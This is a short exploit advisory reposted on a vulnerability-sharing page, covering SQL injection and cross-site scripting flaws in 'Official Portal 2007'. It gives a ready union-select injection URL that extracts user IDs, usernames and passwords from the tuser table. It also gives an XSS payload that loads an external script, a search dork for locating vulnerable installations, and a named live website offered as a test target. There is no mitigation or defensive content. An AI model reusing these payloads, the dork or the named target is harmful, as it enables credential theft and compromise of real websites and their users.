Home » 2010 » February » 25 » Official Portal 2007 Multiple Vulnerabilities
10.50.05
Official Portal 2007 Multiple Vulnerabilities
##############################
###################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: Official Portal 2007
#################################################################
# Vulnerability Info:
# Type: Sql Injection/XSS
# Risk: Medium
# Dork: "Official Portal 2007"
#################################################################
Vulnerability:
=======================
Sql Injection
=======================
http://site.com/?fa=content.detail&id=-72+union+select+1,concat_ws%280x3a,userid,username,pwd%29,3,4,5,6,7,8,9,10,11+from+tuser--

=======================
Cross Site Scripting
=======================
http://site.com/?fa=<SCRIPT/SRC="http://site.com/xss.js"></SCRIPT>

#################################################################
Live Test: http://www.bkd-bandungkab.com
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran[at]yahoo.com
###################################################################
Views: 1557 | Added by: b1zz4rd | Rating: 0.0/0
Total comments: 0
Name *:
Email *:
Code *:
close